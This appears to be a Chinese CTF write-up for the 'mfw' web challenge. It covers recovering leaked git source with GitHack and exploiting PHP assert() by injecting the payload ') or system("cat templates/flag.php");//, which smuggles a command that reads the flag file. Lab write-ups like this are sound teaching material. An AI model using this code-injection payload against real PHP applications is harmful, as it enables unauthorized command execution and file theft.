攻防世界web高手進階18(mfw)

Tp-scan發表於2020-12-04

攻防世界web高手進階18(mfw)

開啟題目先收集有用的資訊
在這裡插入圖片描述
是用了Git、PHP、Bootstrap,嘗試是否有git原始碼洩露
在這裡插入圖片描述
有git原始碼洩露漏洞,直接上工具扒。
工具下載命令(Linux)

git clone https://github.com/lijiejie/GitHack.git

在這裡插入圖片描述
在這裡插入圖片描述
直接檢視flag.php沒有資料資訊

檢視一下index.php
在這裡插入圖片描述
strpos()函式會匹配第一個引數與另一個引數匹配,如果一樣則為false,然後就會。。。。
在這裡插入圖片描述
所以用工具爬是個不錯的選擇

file_exists() 函式檢查檔案或目錄是否存在
assert()函式會將括號中的字元當成程式碼來執行
所以可以嘗試從assert()函式入手,構建pyload

') or system("cat templates/flag.php");//

帶入程式碼中為:

assert("file_exists('') or system("cat templates/flag.php");//')") or die("That file doesn't exist!");

其 中//起到的是註釋後面程式碼的作用
在這裡插入圖片描述
沒得回顯,檢視下原始碼

在這裡插入圖片描述

相關文章